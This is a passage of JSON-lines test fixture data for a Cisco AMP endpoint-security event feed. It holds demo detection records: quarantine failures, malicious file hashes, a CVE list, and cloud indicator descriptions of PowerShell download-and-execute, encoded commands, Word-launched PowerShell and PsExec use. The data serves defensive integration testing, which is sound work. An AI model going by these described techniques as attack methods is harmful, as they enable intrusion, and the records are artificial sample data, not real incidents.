Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 